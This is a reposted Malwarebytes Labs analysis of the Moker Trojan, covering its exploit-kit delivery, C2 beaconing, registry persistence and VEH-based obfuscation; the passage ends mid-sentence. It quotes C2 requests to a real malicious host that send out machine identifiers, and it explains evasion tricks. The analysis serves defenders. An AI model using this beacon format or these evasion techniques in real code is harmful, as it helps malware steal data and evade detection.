{"id":7411,"date":"2017-04-21T11:10:07","date_gmt":"2017-04-21T19:10:07","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2017\/04\/21\/news-1202\/"},"modified":"2017-04-21T11:10:07","modified_gmt":"2017-04-21T19:10:07","slug":"news-1202","status":"publish","type":"post","link":"https:\/\/www.palada.net\/index.php\/2017\/04\/21\/news-1202\/","title":{"rendered":"Elusive Moker Trojan is back"},"content":{"rendered":"<p><strong>Credit to Author: Malwarebytes Labs| Date: Fri, 21 Apr 2017 18:44:58 +0000<\/strong><\/p>\n<p>Some time ago we observed a rare, interesting malware dropped from the Rig-v EK. Its code indicated that it was written by professionals. Research has shown that it is a sample of <a href=\"https:\/\/www.trendmicro.com\/vinfo\/us\/threat-encyclopedia\/malware\/troj_moker.a\" target=\"_blank\">Moker<\/a>\u00a0Trojan that was discovered in 2015 (read more <a href=\"http:\/\/blog.ensilo.com\/moker-a-new-apt-discovered-within-a-sensitive-network\" target=\"_blank\">here<\/a>). However, for a long time, we could not find a sample with a working CnC in order to do deeper research. 
Finally, we found such a sample &#8211; this article will be a deep dive in its capabilities.<\/p>\n<h3>Analyzed samples<\/h3>\n<ul>\n<li><strong><a href=\"https:\/\/www.hybrid-analysis.com\/sample\/af1bd82bf11e5a386abf5e1a1dc9773b66f7936f6e2e8f3ea4cc913794bf5a81?environmentId=100\" target=\"_blank\">76987e1882ef27faab675c4a5ce4248d<\/a> &#8211; main sample &#8211; dropped by EK (April 2017)<\/strong>\n<ul>\n<li><strong><a href=\"https:\/\/virustotal.com\/en\/file\/845992942501fe6fbb15df8392168d09f42e320f316c9649a914ec8b9c3b80ec\/analysis\/1491692602\/\" target=\"_blank\">f961bf2d0504e376b3305e9d06f66de3<\/a>\u00a0&#8211; the main module &#8211; DLL (stage 2)<\/strong><\/li>\n<\/ul>\n<\/li>\n<li><a href=\"https:\/\/virustotal.com\/en\/file\/164222d29856cba2d913e48ee36ef0d7b2fde943d7369437106317e4252f124c\/analysis\/\" target=\"_blank\">e63913d6d389a6bc5f2aa4036717ac27<\/a> &#8211; main sample (dropped by EK)\n<ul>\n<li>4d9f5048e225e8b4dd5feb8ec489e483 &#8211; unpacked payload (stage 1)<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<p>Downloaded modules:<\/p>\n<p><a href=\"https:\/\/virustotal.com\/en\/file\/2f41e714f582af5d044a3a88cd1d3f3cda0478fe1740769ca85b868490d74c77\/analysis\/1492036617\/\" target=\"_blank\">8997b9365c697e757f5a4717ec36fb2d<\/a> &#8211; <em>pluginj382dew1i.exe<\/em><\/p>\n<p><a href=\"https:\/\/virustotal.com\/en\/file\/4f674aef65836687b29635c01457c18d0ef87c2b4218a5ed88275dfa2ef0054f\/analysis\/1492036461\/\" target=\"_blank\">faf2135dc5311b034d31191694a52bbd<\/a> &#8211; <em>KB1080030.exe<\/em><\/p>\n<p>Reference samples (from 2015)<\/p>\n<ul>\n<li><a href=\"https:\/\/www.hybrid-analysis.com\/sample\/c6eef5fcccef671bbc6af65983974af14b1243edad0f73b45924aff4b19fe115?environmentId=1\" target=\"_blank\">9bdd2e72708584c9fd6761252c9b0fb8<\/a> &#8211; sample #1<\/li>\n<li><a href=\"https:\/\/virustotal.com\/en\/file\/2ed9022b917ddef85a699fd09e879fce8461c007006a5a11449e122269d5f5c7\/analysis\/\" target=\"_blank\">5f005beb917acfeb28e0a410909e6d6b<\/a> &#8211; 
sample #2\n<ul>\n<li><a href=\"https:\/\/virustotal.com\/en\/file\/2ed9022b917ddef85a699fd09e879fce8461c007006a5a11449e122269d5f5c7\/analysis\/\" target=\"_blank\">650ce9e81d7f86660e2d37cbde8f160a<\/a> &#8211; unpacked Stage 1<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<h3>Distribution method<\/h3>\n<p>We found Moker Trojan distributed via exploit kits &#8211; in malvertising campaigns, as well as dropped from the hacked sites. Example &#8211; Rig-v EK dropping Moker:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-17488\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/rigv_dropping.png\" alt=\"\" width=\"918\" height=\"122\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/rigv_dropping.png 918w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/rigv_dropping-300x40.png 300w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/rigv_dropping-600x80.png 600w\" sizes=\"auto, (max-width: 918px) 100vw, 918px\" \/><\/p>\n<h3>Behavioral analysis<\/h3>\n<p>The malware injects itself into the <em>svchost<\/em>, and then contacts the CnC server.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-17222\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/injected.png\" alt=\"\" width=\"442\" height=\"171\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/injected.png 442w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/injected-300x116.png 300w\" sizes=\"auto, (max-width: 442px) 100vw, 442px\" \/><\/p>\n<h4>Network communication<\/h4>\n<p>The communication is encrypted. 
The typical way of beaconing is to send a request to the address: <em>&lt;gate_name&gt;.php?img=&lt;number&gt; <\/em><br \/> An example of the sent request:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-17280\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/request_1-1.png\" alt=\"\" width=\"654\" height=\"21\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/request_1-1.png 654w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/request_1-1-300x10.png 300w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/request_1-1-600x19.png 600w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/request_1-1-630x21.png 630w\" sizes=\"auto, (max-width: 654px) 100vw, 654px\" \/><\/p>\n<pre>GET \/nnnn04722.php?img=1 HTTP\/1.1\nUser-Agent: Mozilla\nHost: bitmixc.ml<\/pre>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-17226\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/beacon.png\" alt=\"\" width=\"857\" height=\"409\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/beacon.png 857w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/beacon-300x143.png 300w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/beacon-600x286.png 600w\" sizes=\"auto, (max-width: 857px) 100vw, 857px\" \/><\/p>\n<p>The server responds with encrypted content (the bot saves it in a registry key). 
Then it injects itself in other applications and sends further requests, including the data of the infected machine, i.e.:<\/p>\n<p><a href=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/requests_2-3.png\" target=\"_blank\" data-rel=\"lightbox-0\" title=\"\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-17283\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/requests_2-3.png\" alt=\"\" width=\"866\" height=\"70\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/requests_2-3.png 866w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/requests_2-3-300x24.png 300w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/requests_2-3-600x48.png 600w\" sizes=\"auto, (max-width: 866px) 100vw, 866px\" \/><\/a><\/p>\n<pre>GET \/nnnn04722.php?page=&lt;computername&gt;&lt;windows_version&gt;_&lt;disk_id&gt;&amp;s=&lt;number&gt;p=&lt;number&gt;.&lt;number&gt;&amp;err=&lt;number&gt;.&lt;number&gt;<\/pre>\n<p>In the below case, the response turned out to be a PE file (an updated version of the bot) obfuscated by XOR with a character &#8216;c&#8217;.<br \/> <img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-17224\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/moker_comm.png\" alt=\"\" width=\"627\" height=\"613\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/moker_comm.png 627w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/moker_comm-300x293.png 300w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/moker_comm-600x587.png 600w\" sizes=\"auto, (max-width: 627px) 100vw, 627px\" \/><\/p>\n<p>The server responds either by sending some encrypted content or a number:<\/p>\n<pre>=&lt;number&gt;<\/pre>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-17231\" 
src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/resp_bytes.png\" alt=\"\" width=\"685\" height=\"347\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/resp_bytes.png 685w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/resp_bytes-300x152.png 300w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/resp_bytes-600x304.png 600w\" sizes=\"auto, (max-width: 685px) 100vw, 685px\" \/><\/p>\n<h4>Persistence<\/h4>\n<p>Moker achieves its persistence by adding a Run key in the registry. This method may look very simple at first. However, the authors of the malware hid the real executable behind a legitimate Microsoft application &#8211; Rundll32.exe. Thanks to this trick, it is much harder to notice: a popular tool used to examine persistent applications, <em>Sysinternals&#8217; autoruns<\/em>, does not show such keys by default, assuming that they are harmless.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-17271\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/moker_run_key.png\" alt=\"\" width=\"835\" height=\"155\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/moker_run_key.png 835w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/moker_run_key-300x56.png 300w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/moker_run_key-600x111.png 600w\" sizes=\"auto, (max-width: 835px) 100vw, 835px\" \/><\/p>\n<p>The sample of Moker is dropped in the current user&#8217;s home directory:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-17269\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/moker_dropped.png\" alt=\"\" width=\"583\" height=\"210\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/moker_dropped.png 583w, 
https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/moker_dropped-300x108.png 300w\" sizes=\"auto, (max-width: 583px) 100vw, 583px\" \/><\/p>\n<p>If we take a closer look at the sample, we can see that it has been slightly modified in comparison to the original one &#8211; some encrypted information has been removed:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-17478\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/cnc_addr_removed.png\" alt=\"\" width=\"892\" height=\"360\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/cnc_addr_removed.png 892w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/cnc_addr_removed-300x121.png 300w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/cnc_addr_removed-600x242.png 600w\" sizes=\"auto, (max-width: 892px) 100vw, 892px\" \/><\/p>\n<p>As it turned out after further research (see the section &#8220;Inside&#8221;), those bytes contain the CnC address, prefixed by a special tag. 
The information removed from the executable is not lost but stored elsewhere &#8211; in one of the registry keys created for storing the malware configuration.<\/p>\n<p>Other keys created by the malware are saved under &#8220;<em>..CLSID{448D3B34-8D3B-3B34-8D3B-48D3448D3B34}&#8221;:<\/em><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-17479\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/keys_set1.png\" alt=\"\" width=\"864\" height=\"322\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/keys_set1.png 864w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/keys_set1-300x112.png 300w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/keys_set1-600x224.png 600w\" sizes=\"auto, (max-width: 864px) 100vw, 864px\" \/><\/p>\n<p>The full dump of the registry entries is available <a href=\"https:\/\/gist.githubusercontent.com\/hasherezade\/40157ab29c6b1001855a0589b1d5369a\/raw\/5987889557e092a8c35653881e2a78d940102d24\/moker.reg\" target=\"_blank\">here<\/a>.<\/p>\n<p>As it turned out, the encrypted CnC address, that was removed from the executable, is persisted in\u00a0 the registry, inside the key &#8220;5&#8221;:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-17480\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/cnc_in_registry.png\" alt=\"\" width=\"451\" height=\"193\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/cnc_in_registry.png 451w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/cnc_in_registry-300x128.png 300w\" sizes=\"auto, (max-width: 451px) 100vw, 451px\" \/><\/p>\n<p>Compare with the data from inside the original sample:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-17482\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/cnc_addr_in_sample.png\" alt=\"\" width=\"627\" 
height=\"136\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/cnc_addr_in_sample.png 627w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/cnc_addr_in_sample-300x65.png 300w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/cnc_addr_in_sample-600x130.png 600w\" sizes=\"auto, (max-width: 627px) 100vw, 627px\" \/><\/p>\n<p>Another key, &#8220;6&#8221;, stores a PE file (the executable dumped from the registry is available here: <a href=\"https:\/\/virustotal.com\/en\/file\/aec046984fd89902559db13fe1e2fab4c5a4c969eed6b6e59d617d109eed3ec9\/analysis\/1491351756\/\" target=\"_blank\">91f754c3fc475aed93e80575bb503c73<\/a>).<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-17481\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/reg_pe_file.png\" alt=\"\" width=\"446\" height=\"326\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/reg_pe_file.png 446w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/reg_pe_file-300x219.png 300w\" sizes=\"auto, (max-width: 446px) 100vw, 446px\" \/><\/p>\n<p>The key &#8220;7&#8221; stores the data that was downloaded from the CnC after the initial beacon:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-17312\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/server_resp_stored.png\" alt=\"\" width=\"455\" height=\"325\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/server_resp_stored.png 455w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/server_resp_stored-300x214.png 300w\" sizes=\"auto, (max-width: 455px) 100vw, 455px\" \/><\/p>\n<p>Compare with the content of the server response:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-17313\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/server_resp.png\" alt=\"\" 
width=\"724\" height=\"654\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/server_resp.png 724w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/server_resp-300x271.png 300w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/server_resp-600x542.png 600w\" sizes=\"auto, (max-width: 724px) 100vw, 724px\" \/><\/p>\n<p>The key &#8220;10&#8221; contains the name of the downloaded module:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-17309\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/plugin.png\" alt=\"\" width=\"446\" height=\"150\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/plugin.png 446w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/plugin-300x101.png 300w\" sizes=\"auto, (max-width: 446px) 100vw, 446px\" \/><\/p>\n<p>The new module is stored in <em>ProgramData<\/em>:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-17308\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/dropped_plugin.png\" alt=\"\" width=\"585\" height=\"207\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/dropped_plugin.png 585w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/dropped_plugin-300x106.png 300w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/dropped_plugin-470x165.png 470w\" sizes=\"auto, (max-width: 585px) 100vw, 585px\" \/><\/p>\n<p>Its persistence is added also with the help of a Run key (in a similar way as\u00a0the previously described case):<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-17310\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/plugin_persist1.png\" alt=\"\" width=\"765\" height=\"149\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/plugin_persist1.png 765w, 
https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/plugin_persist1-300x58.png 300w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/plugin_persist1-600x117.png 600w\" sizes=\"auto, (max-width: 765px) 100vw, 765px\" \/><\/p>\n<h3>Inside<\/h3>\n<p>Moker consists of two main modules: <em>Stage 1<\/em>, which is a downloader, and <em>Stage 2<\/em>, which is a DLL containing the core malicious features. The downloader injects itself, along with the unpacked shellcode, into <em>svchost.exe<\/em>. The screenshot below shows an example of the infected memory pages inside <em>svchost.exe<\/em>:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-17483\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/injected_dll_shellcode.png\" alt=\"\" width=\"664\" height=\"582\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/injected_dll_shellcode.png 664w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/injected_dll_shellcode-300x263.png 300w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/injected_dll_shellcode-600x526.png 600w\" sizes=\"auto, (max-width: 664px) 100vw, 664px\" \/><\/p>\n<p>The injected shellcode is responsible for sending the initial beacon to the CnC. Then, if the CnC is active, the main DLL is downloaded and injected into other processes. During the tests, all 32-bit applications running at Medium integrity level were infected by the Moker DLL.<\/p>\n<h4>Stage 1<\/h4>\n<p>Let&#8217;s dive into the code, starting from the dropper &#8211; that is, Stage 1. This is the binary used to initiate the full infection process &#8211; originally delivered by exploit kits. 
Every sample comes packed by some crypter (the crypters differ between samples, so we will not describe this layer here).<\/p>\n<p>After defeating the crypter&#8217;s stub, we get another PE file &#8211; with a layout typical for Moker. The <em>.text<\/em> section, which in normal cases is the first section of a PE, in Moker&#8217;s case comes second:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-17242\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/moker_layout.png\" alt=\"\" width=\"195\" height=\"213\" \/><\/p>\n<p>Section <em>.data<\/em> is very small in the raw file, but it expands in the virtual image. So, we can suspect that something more is unpacked there:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-17243\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/sections_rv.png\" alt=\"\" width=\"878\" height=\"564\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/sections_rv.png 878w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/sections_rv-300x193.png 300w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/sections_rv-600x385.png 600w\" sizes=\"auto, (max-width: 878px) 100vw, 878px\" \/><\/p>\n<h5>Obfuscated execution flow<\/h5>\n<p>The internal structure of this module is very interesting. It has self-modifying code with execution based on VEH (Vectored Exception Handlers). 
Execution starts by installing the handler:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-17598\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/start_from_veh.png\" alt=\"\" width=\"416\" height=\"92\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/start_from_veh.png 416w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/start_from_veh-300x66.png 300w\" sizes=\"auto, (max-width: 416px) 100vw, 416px\" \/><\/p>\n<p><em>IN<\/em> instructions are used in various places in the code. Their role is to disrupt the continuity of execution by triggering an exception (<em>IN<\/em> is a privileged instruction, so executing it in user mode faults). Then, execution is redirected to the previously installed handler. Depending on the variant of the instruction that triggered the exception, the context is changed in one of a few ways:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-17601\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/exception_translator.png\" alt=\"\" width=\"557\" height=\"656\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/exception_translator.png 557w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/exception_translator-255x300.png 255w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/exception_translator-509x600.png 509w\" sizes=\"auto, (max-width: 557px) 100vw, 557px\" \/><\/p>\n<p>Context patching is used to obfuscate the execution flow. Thanks to this trick, static analysis of the code is almost impossible &#8211; everything changes on the fly.<\/p>\n<p>The <em>JMP EAX<\/em> (first case in the exception handler) is used to deploy API calls. 
It is triggered by <em>IN AL, &lt;BYTE&gt;<\/em> (see the example below):<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-17635\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/to_call_api.png\" alt=\"\" width=\"625\" height=\"275\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/to_call_api.png 625w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/to_call_api-300x132.png 300w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/to_call_api-600x264.png 600w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/to_call_api-195x85.png 195w\" sizes=\"auto, (max-width: 625px) 100vw, 625px\" \/><\/p>\n<p>That&#8217;s why, if we trace the API calls made by the application, we can notice that most of them are made from the same address in the code &#8211; only the target address is changing.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-17232\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/api_calls_via_same_addr.png\" alt=\"\" width=\"674\" height=\"153\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/api_calls_via_same_addr.png 674w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/api_calls_via_same_addr-300x68.png 300w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/api_calls_via_same_addr-600x136.png 600w\" sizes=\"auto, (max-width: 674px) 100vw, 674px\" \/><\/p>\n<p>Not only the execution flow but also the code itself is dynamically modified. 
We can see the application calling <em>VirtualAlloc<\/em> very often:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-17604\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/virtual_alloc.png\" alt=\"\" width=\"623\" height=\"123\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/virtual_alloc.png 623w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/virtual_alloc-300x59.png 300w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/virtual_alloc-600x118.png 600w\" sizes=\"auto, (max-width: 623px) 100vw, 623px\" \/><\/p>\n<p>Some pieces of the encrypted code are copied from the main executable into this dynamically allocated memory:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-17613\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/coping_code.png\" alt=\"\" width=\"446\" height=\"279\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/coping_code.png 446w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/coping_code-300x188.png 300w\" sizes=\"auto, (max-width: 446px) 100vw, 446px\" \/><\/p>\n<p>Then, they are decrypted by a dedicated function:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-17612\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/decrypting1.png\" alt=\"\" width=\"450\" height=\"475\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/decrypting1.png 450w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/decrypting1-284x300.png 284w\" sizes=\"auto, (max-width: 450px) 100vw, 450px\" \/><\/p>\n<p>The revealed code is almost ready &#8211; except for the addresses of calls, which still need to be filled in. 
You can see in the following fragment that, temporarily, the CALL points to its own address:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-17617\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/addresses.png\" alt=\"\" width=\"382\" height=\"137\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/addresses.png 382w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/addresses-300x108.png 300w\" sizes=\"auto, (max-width: 382px) 100vw, 382px\" \/><\/p>\n<p>This is fixed in another step &#8211; the decoding function returns into another code fragment, which modifies the addresses:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-17615\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/more_modifications.png\" alt=\"\" width=\"395\" height=\"187\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/more_modifications.png 395w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/more_modifications-300x142.png 300w\" sizes=\"auto, (max-width: 395px) 100vw, 395px\" \/><\/p>\n<p>This continues until the new piece of code is fully revealed and ready to be called (see the fixed CALL target):<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-17621\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/fixed_addr-1.png\" alt=\"\" width=\"436\" height=\"129\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/fixed_addr-1.png 436w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/fixed_addr-1-300x89.png 300w\" sizes=\"auto, (max-width: 436px) 100vw, 436px\" \/><\/p>\n<p>When the modifying function returns, execution falls into the line that performs a jump into the new code:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-17619\" 
src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/jump_to_new-1.png\" alt=\"\" width=\"390\" height=\"132\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/jump_to_new-1.png 390w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/jump_to_new-1-300x102.png 300w\" sizes=\"auto, (max-width: 390px) 100vw, 390px\" \/><\/p>\n<p>The revealed code forms another layer &#8211; again allocating, decrypting and calling code.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-17622\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/next_layer.png\" alt=\"\" width=\"677\" height=\"685\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/next_layer.png 677w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/next_layer-296x300.png 296w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/next_layer-593x600.png 593w\" sizes=\"auto, (max-width: 677px) 100vw, 677px\" \/><\/p>\n<p>The code chunks that provide some real functionality are always deployed via this type of proxy &#8211; which makes the execution flow more complicated.<\/p>\n<h5>Functionality<\/h5>\n<p>The dropper starts execution with defensive checks, ensuring that it is not run in a controlled environment. The following registry keys are 